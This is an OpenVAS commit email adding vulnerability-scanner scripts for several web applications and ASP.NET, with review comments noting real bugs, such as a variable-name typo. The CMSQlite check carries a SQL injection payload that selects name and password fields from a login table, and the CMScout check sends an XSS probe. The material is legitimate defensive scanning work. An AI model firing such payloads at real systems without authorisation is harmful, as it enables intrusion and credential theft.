[Openvas-commits] r7970 - in trunk/openvas-plugins: . scripts
Wed Jun 9 08:34:57 CEST 2010
Author: chandra
Date: 2010-06-09 08:34:53 +0200 (Wed, 09 Jun 2010)
New Revision: 7970
Added:
trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl
trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl
trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl
trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_dotnet_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_pacific_timesheet_csrf_vuln.nasl
trunk/openvas-plugins/scripts/gb_pacific_timesheet_detect.nasl
trunk/openvas-plugins/scripts/gb_snipegallery_detect.nasl
trunk/openvas-plugins/scripts/gb_snipegallery_remote_file_include_vuln.nasl
Modified:
trunk/openvas-plugins/ChangeLog
trunk/openvas-plugins/scripts/cpe.inc
Log:
Added new plugins
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/ChangeLog 2010-06-09 06:34:53 UTC (rev 7970)
@@ -1,3 +1,22 @@
+2010-06-09 Chandrashekhar B <bchandra at secpod.com>
+
+ * scripts/gb_pacific_timesheet_csrf_vuln.nasl,
+ scripts/gb_jv2_folder_gallery_rfi_vuln.nasl,
+ scripts/gb_cmscout_xss_vuln.nasl,
+ scripts/gb_ms_asp_dotnet_xss_vuln.nasl,
+ scripts/gb_pacific_timesheet_detect.nasl,
+ scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl,
+ scripts/gb_ms_dotnet_xss_vuln.nasl,
+ scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl,
+ scripts/gb_snipegallery_remote_file_include_vuln.nasl,
+ scripts/gb_jv2_folder_gallery_detect.nasl,
+ scripts/gb_cmscout_detect.nasl,
+ scripts/gb_snipegallery_detect.nasl:
+ Added new plugins.
+
+ * scripts/cpe.inc:
+ Added new CPE's.
+
2010-06-07 Chandrashekhar B <bchandra at secpod.com>
* scripts/gb_ubuntu_USN_947_1.nasl,
Modified: trunk/openvas-plugins/scripts/cpe.inc
===================================================================
--- trunk/openvas-plugins/scripts/cpe.inc 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/cpe.inc 2010-06-09 06:34:53 UTC (rev 7970)
@@ -839,7 +839,11 @@
"www/*//HP/OVNNM/Ver", "^([0-9.]+)", "cpe:/a:hp:openview_network_node_manager:",
"Mathematica/Ver", "^([0-9.]+)", "cpe:/a:wolfram_research:mathematica:",
"OrbitDownloader/Ver", "^([0-9.]+)", "cpe:/a:orbitdownloader:orbit_downloader:",
-"www/*//Uniform-Server", "^([0-9.]+)", ""
+"www/*//Uniform-Server", "^([0-9.]+)", "cpe:/a:uniformserver:uniformserver:",
+"www/*/JV2/Folder/Gallery", "^([0-9.]+)", "cpe:/a:jv2design:jv2_folder_gallery:",
+"www/*/snipegallery", "^([0-9.]+)", "cpe:/a:snipegallery:snipe_gallery:",
+"www/*/pacificTimeSheet/Ver", "^([0-9.]+)", "cpe:/a:pacifictimesheet:pacific_timesheet:",
+"www/*/CMScout", "^([0-9.]+)", "cpe:/a:cmscout:cmscout:"
);
Added: trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,74 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cmscout_detect.nasl 9416 2010-06-08 15:10:36Z jun $
+#
+# CMScout Version Detection
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800790);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("CMScout Version Detection");
+ desc = "
+ Overview: This script finds the installed CMScout version and saves
+ the result in KB.";
+
+ script_description(desc);
+ script_summary("Set the version of CMScout in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+
+cmsPort = get_http_port(default:80);
+if(!cmsPort){
+ exit(0);
+}
+
+foreach path (make_list("/", "/cmscout", "/cmscout", cgi_dirs()))
+{
+ ## Send and receive response
+ sndReq = http_get(item:string(path, "/index.php"), port:cmsPort);
+ rcvRes = http_send_recv(port:cmsPort, data:sndReq);
+
+ ## Confirm the application
+ if(":: CMScout ::" >< rcvRes || ">Welcome to CMScout" >< rcvRes)
+ {
+ ## Grep for the version
+ cmsVer = eregmatch(pattern:"CMScout ([0-9.]+)", string:rcvRes);
+ if(cmsVer[1] != NULL)
+ {
+ ## Set the KB value
+ set_kb_item(port:cmsPort, name:"www/" + cmsPort + "/CMScout", value:cmsVer[1]
+ + " under " + path);
+ security_note(data:"CMScout version " + cmsVer[1] +
+ " running at location " + path + " was detected on the host");
+ }
+ }
+}
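Review bot: The path list on L125 contains "/cmscout" twice, so the same index.php request is sent and parsed twice per host for no gain; `foreach path (make_list("/", "/cmscout", cgi_dirs()))` is enough. The port check on L121 only tests that a port value exists, whereas the sibling gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl in this commit also calls get_port_state before sending anything; the detect script should do the same so a closed port is not probed through every candidate directory. A one-line header comment stating the KB value format written on L139, `# KB value is "<version> under <path>", parsed by gb_cmscout_xss_vuln.nasl`, would make the coupling between the two scripts visible.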
Property changes on: trunk/openvas-plugins/scripts/gb_cmscout_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,116 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cmscout_xss_vuln.nasl 9416 2010-06-07 16:13:29 jun $
+#
+# CMScout Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+################################i###############################################
+
+if(description)
+{
+ script_id(800791);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2154");
+ script_bugtraq_id(40442);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("CMScout Cross-Site Scripting Vulnerability");
+ desc = "
+ Overview: This host is running CMScout and is prone to Cross Site Scripting
+ Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused by an input validation error in the 'search' module when
+ processing the 'search' parameter in 'index.php' page.
+
+ Impact:
+ Successful exploitation will let the attacker to execute arbitrary script
+ code.
+
+ Impact Level: Application.
+
+ Affected Software/OS:
+ CMScout version 2.09 and prior.
+
+ Fix: No solution or patch is available as on 07th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.cmscout.co.za/
+
+ References:
+ http://secunia.com/advisories/39986
+ http://xforce.iss.net/xforce/xfdb/58996
+ http://www.exploit-db.com/exploits/12806/
+ http://www.vupen.com/english/advisories/2010/1288 ";
+
+ script_description(desc);
+ script_summary("Check the exploit string on CMScout");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("gb_cmscout_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+cmsPort = get_http_port(default:80);
+if(!cmsPort){
+ exit(0);
+}
+
+cmsVer = get_kb_item("www/" + cmsPort + "/CMScout");
+if(!cmsVer){
+ exit(0);
+}
+
+cmsVer = eregmatch(pattern:"^(.+) under (/.*)$", string:cmsVer);
+if(cmsVer[2] != NULL)
+{
+ filename = string(cmsVer[2] + "/index.php?page=search&menuid=5");
+ host = get_host_name();
+ authVariables = "search=OpenVAS+XSS+Testing&content=1&Submit=Search";
+
+ ## Construct XSS Request
+ sndReq = string("POST ", filename, " HTTP/1.1\r\n",
+ "Host: ", host, "\r\n",
+ "User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4\r\n",
+ "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n",
+ "Accept-Language: en-us,en;q=0.5\r\n",
+ "Accept-Encoding: gzip,deflate\r\n",
+ "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n",
+ "Keep-Alive: 300\r\n",
+ "Connection: keep-alive\r\n",
+ "Referer: http://", host, filename, "\r\n",
+ "Cookie: cmscout2=1f9f3e24745df5907a131c9acb41e5ef\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(authVariables), "\r\n\r\n",
+ authVariables);
+ rcvRes = http_keepalive_send_recv(port:cmsPort, data:sndReq);
+
+ ## Checking the response for exploit string
+ if("(OpenVAS XSS Testing)" >< rcvRes){
+ security_warning(cmsPort);
+ }
+}
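Review bot: The confirmation on L267 only checks that the submitted search term is echoed back, and "OpenVAS XSS Testing" contains no character that output encoding would alter, so a patched install that HTML-encodes the 'search' parameter returns the same text and is still reported as vulnerable. The version captured on L242 (cmsVer[1]) is never consulted, although the description limits the issue to 2.09 and prior; gating on it would remove that false positive. Separately, the request advertises `Accept-Encoding: gzip,deflate` on L255 while the substring test reads the raw body, so a server that honours the header returns a compressed response the check cannot see; drop that header. The fixed `Cookie: cmscout2=...` value on L260 is a constant that has no meaning for the target and should go as well.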
Property changes on: trunk/openvas-plugins/scripts/gb_cmscout_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,104 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl 9311 2010-06-04 15:50:29 jun $
+#
+# CMSQlite 'index.php' SQL Injection and Directory Traversal Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(800789);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2095", "CVE-2010-2096");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("CMSQlite 'index.php' SQL Injection and Directory Traversal Vulnerabilities");
+ desc = "
+ Overview: This host is running CMSQlite and is prone to multiple SQL injection
+ and directory traversal vulnerabilities.
+
+ Vulnerability Insight:
+ The flaws are due to,
+ - Improper validation of user supplied input to 'c' parameter in 'index.php',
+ allows attackers to execute SQL commands.
+ - Improper validation of user supplied input to 'mod' parameter in 'index.php',
+ allows attackers to include and execute local files.
+
+ Impact:
+ Successful exploitation will allow attackers to execute SQL commands and
+ arbitrary local files.
+
+ Impact Level: Application.
+
+ Affected Software:
+ CMSQlite version 1.2 and prior.
+
+ Fix: No solution or patch is available as on 04th June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.cmsqlite.net/
+
+ References:
+ http://php-security.org/2010/05/15/mops-2010-029-cmsqlite-c-parameter-sql-injection-vulnerability/index.html
+ http://php-security.org/2010/05/15/mops-2010-030-cmsqlite-mod-parameter-local-file-inclusion-vulnerability/index.html ";
+
+ script_description(desc);
+ script_summary("Check the exploit string on CMSQlite");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_require_ports("Services/www", 80);
+ script_family("Web application abuses");
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+## Get HTTP Port
+cmsPort = get_http_port(default:80);
+if(!get_port_state(cmsPort)){
+ exit(0);
+}
+
+foreach path (make_list("/", "/cmsqlite", "/cmsqlite10", cgi_dirs()))
+{
+ ## Send and receive response
+ sndReq = http_get(item:string(path, "/index.php"), port:cmsPort);
+ rcvRes = http_send_recv(port:cmsPort, data:sndReq);
+
+ ## Confirm the application
+ if(">CMSQlite<" >< rcvRes)
+ {
+ ## Try an exploit
+ sndReq = http_get(item:string(path, "/index.php?c=2-2%20UNION%20ALL%20" +
+ "SELECT%202,name%20||%20password,%203,4,5,6%20FR" +
+ "OM%20login%20limit%201%20--%20x"), port:cmsPort);
+ rcvRes = http_send_recv(port:cmsPort, data:sndReq);
+
+ ## Confirm the vulnerability
+ if(!isnull(rcvRes) && eregmatch(pattern:">admin.*</",string:rcvRes))
+ {
+ security_hole(cmsPort);
+ exit(0);
+ }
+ }
+}
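Review bot: The confirmation on L377 matches `>admin.*</`, which a normal CMSQlite page can already contain (an "admin" link or label), and the baseline response fetched on L365 is never tested for that pattern, so an unaffected install may be reported. Check the baseline first, `if(eregmatch(pattern:">admin.*</", string:rcvRes)) continue;`, or match on something only the injected result can produce. The probe on L371-373 also pulls `name || password` from the login table into the scanner's response buffer, which is more data than a presence check needs and ends up in scan logs; a comment in the header should at least state that credential material may be retrieved. `include("version_func.inc")` on L353 is unused.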
Property changes on: trunk/openvas-plugins/scripts/gb_cmsqlite_sql_inj_n_dir_trav_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,77 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_jv2_folder_gallery_detect.nasl 9370 2010-06-03 10:10:36Z june $
+#
+# JV2 Folder Gallery Version Detection
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801350);
+ script_version("$Revision$: 1.0");
+ script_tag(name:"risk_factor", value:"None");
+ script_name("JV2 Folder Gallery Version Detection");
+ desc = "
+ Overview: This script finds the running JV2 Folder Gallery version and saves
+ the result in KB.";
+
+ script_description(desc);
+ script_summary("Set the version of JV2 Folder Gallery in KB");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_family("Service detection");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+
+jfgPort = get_http_port(default:80);
+
+if(!jfgPort){
+ jfgPort = 80;
+}
+
+if(!get_port_state(jfgPort)){
+ exit(0);
+}
+
+foreach dir (make_list("/gallery", "/foldergallery", "/Gallery", cgi_dirs()))
+{
+ sndReq = http_get(item:dir + "/index.php", port:jfgPort);
+ rcvRes = http_send_recv(port:jfgPort, data:sndReq);
+
+ if(">JV2 Folder Gallery<" >< rcvRes)
+ {
+ jfgVer = eregmatch(pattern:"> v ([0-9.]+)", string:rcvRes);
+ if(jfgVer[1] != NULL)
+ {
+ set_kb_item(port:jfgPort, name:"www/" + jfgPort + "/JV2/Folder/Gallery",
+ value:jfgVer[1] + " under " + dir);
+ security_note(data:"JV2 Folder Gallery version " + jfgVer[1] +
+ " running at location " + dir + " was detected on the host");
+
+ }
+ }
+}
+
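Review bot: The fallback on L443-445 is either dead or wrong: get_http_port(default:80) on L441 already yields 80 when no port is known, and if it returns a false value to signal that no web service was found, forcing `jfgPort = 80` overrides that signal. The sibling gb_cmscout_detect.nasl in this commit exits in that case; `if(!jfgPort){ exit(0); }` keeps the two detection scripts consistent. The version pattern `> v ([0-9.]+)` on L458 is loose enough to match unrelated text; a header comment describing the page fragment it is meant to match would help the next maintainer.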
Property changes on: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_detect.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_jv2_folder_gallery_rfi_vuln.nasl 9370 2010-06-03 15:11:27Z June $
+#
+# JV2 Folder Gallery 'lang_file' Parameter Remote File Inclusion Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801351);
+ script_version("$Revision$: 1.0");
+ script_cve_id("CVE-2010-2127");
+ script_bugtraq_id(40339);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("JV2 Folder Gallery 'lang_file' Parameter Remote File Inclusion Vulnerability");
+ desc = "
+ Overview: The host is running JV2 Folder Gallery and is prone to remote
+ file inclusion vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to improper sanitization of user supplied input in
+ 'lang_file' parameter in 'gallery/gallery.php' while including external
+ files for processing.
+
+ Impact:
+ Successful exploitation could allow remote attackers to execute arbitrary
+ PHP code via a URL in the lang_file parameter.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ JV2 Folder Gallery version 3.1 and prior.
+
+ Fix: No solution or patch is available as on 03rd June, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://foldergallery.jv2.net/Download/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/58807
+ http://www.exploit-db.com/exploits/12688
+ http://packetstormsecurity.org/1005-exploits/jv2foldergallery-rfi.txt ";
+
+ script_description(desc);
+ script_summary("Check for the version JV2 Folder Gallery");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2010 Greenbone Networks GmbH");
+ script_dependencies("gb_jv2_folder_gallery_detect.nasl");
+ script_family("Web application abuses");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+
+vfgPort = get_http_port(default:80);
+if(!vfgPort){
+ exit(0);
+}
+
+vfgVer = get_kb_item("www/" + vfgPort + "/JV2/Folder/Gallery");
+if(!vfgVer){
+ exit(0);
+}
+
+vfgVer = eregmatch(pattern:"^(.+) under (/.*)$", string:vfgVer);
+if(vfgVer[1] != NULL)
+{
+ if(version_is_less_equal(version:vfgVer[1], test_version:"3.1")){
+ security_hole(vfgPort);
+ }
+}
Property changes on: trunk/openvas-plugins/scripts/gb_jv2_folder_gallery_rfi_vuln.nasl
___________________________________________________________________
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_asp_dotnet_xss_vuln.nasl 2010-06-04 10:13:17Z jun $
+#
+# Microsoft ASP.NET Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801342);
+ script_version("$Revision$:1.0");
+ script_cve_id("CVE-2010-2084");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Microsoft ASP.NET Cross-Site Scripting vulnerability");
+ desc = "
+ Overview: The host is running Microsoft ASP .NET and is prone to Cross-Site
+ Scripting Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in the handling of 'HtmlContainerControl', which
+ does not prevent setting the 'InnerHtml' property on a control that inherits
+ from HtmlContainerControl when processing the vectors related to an attribute.
+
+ Impact:
+ Successful exploitation could allow attackers to conduct cross-site scripting
+ attacks against the form control via vectors related to an attribute.
+
+ Affected Software/OS:
+ Microsoft ASP.NET version 2.0 and prior.
+
+ Fix: No solution or patch is available as on 04th Jun, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.microsoft.com/downloads/details.aspx?displaylang=en
+
+ References:
+ http://en.securitylab.ru/nvd/394300.php
+ https://launchpad.net/bugs/cve/2010-2084
+ http://www.communities.hp.com/securitysoftware/blogs/spilabs/archive/2010/03/30/configuration-is-half-the-battle-asp-net-and-cross-site-scripting.aspx ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_summary("Check the version of Microsoft ASP .NET");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_dependencies("remote-detect-MSdotNET-version.nasl");
+ script_require_ports("Services/www");
+ script_require_keys("dotNET/install", "aspNET/installed", "aspNET/version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+dotNet = get_kb_item("dotNET/install");
+if(!dotNet){
+ exit(0);
+}
+
+apsdotNet = get_kb_item("aspNET/installed");
+if(!aspdotNet){
+ exit(0);
+}
+
+aspdotnetVer = get_kb_item("aspNET/version");
+if(!dotNet){
+ exit(0);
+}
+
+## Check for Microsoft ASP.NET version less than or equal 2.0
+if(version_is_less_equal(version:aspdotnetVer, test_version:"2.0")){
+ security_warning(0);
+}
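Review bot: The variable assigned on L660 is `apsdotNet` but L661 tests `aspdotNet`, which is never set, so the script always exits here and never reports; the line should read `aspdotNet = get_kb_item("aspNET/installed");`. The same typo appears in gb_ms_dotnet_viewstate_xss_vuln.nasl (L762-L763) and gb_ms_dotnet_xss_vuln.nasl (L865-L866). Additionally, L666 re-tests `dotNet` instead of the value just read on L665, so a missing aspNET/version key reaches version_is_less_equal on L671 as NULL; it should be `if(!aspdotnetVer){`.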
Property changes on: trunk/openvas-plugins/scripts/gb_ms_asp_dotnet_xss_vuln.nasl
___________________________________________________________________
Name: svn:executable
+ *
Name: svn:keywords
+ Revision
Added: trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl 2010-06-08 11:06:12 UTC (rev 7969)
+++ trunk/openvas-plugins/scripts/gb_ms_dotnet_viewstate_xss_vuln.nasl 2010-06-09 06:34:53 UTC (rev 7970)
@@ -0,0 +1,92 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_dotnet_viewstate_xss_vuln.nasl 2010-06-01 10:13:17Z jun $
+#
+# Microsoft .NET '__VIEWSTATE' Cross-Site Scripting Vulnerability
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(801344);
+ script_version("$Revision$:1.0");
+ script_cve_id("CVE-2010-2088");
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_name("Microsoft .NET '__VIEWSTATE' Cross-Site Scripting vulnerability");
+ desc = "
+ Overview: The host is running Microsoft .NET and is prone to Cross-Site
+ Scripting Vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in the handling of the '__VIEWSTATE' parameter
+ in 'ASP.NET', which does not properly handle an unencrypted view state.
+
+ Impact:
+ Successful exploitation could allow attackers to conduct cross-site scripting
+ attacks against the form control via the __VIEWSTATE parameter.
+
+ Affected Software/OS:
+ Microsoft .NET version 3.5 and prior.
+
+ Fix: No solution or patch is available as on 31st May, 2010. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.microsoft.com/downloads/details.aspx?displaylang=en
+
+ References:
+ https://www.trustwave.com/spiderlabs/advisories/TWSL2010-001.txt
+ http://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf ";
+
+ script_description(desc);
+ script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
+ script_summary("Check the version of Microsoft .NET");
+ script_category(ACT_GATHER_INFO);
+ script_family("Windows");
+ script_dependencies("remote-detect-MSdotNET-version.nasl");
+ script_require_ports("Services/www");
+ script_require_keys("dotNET/install", "aspNET/installed", "dotNet/version");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get the version from KB
+dotNet = get_kb_item("dotNET/install");
+if(!dotNet){
+ exit(0);
+}
+
+apsdotNet = get_kb_item("aspNET/installed");
+if(!aspdotNet){
+ exit(0);
+}
+
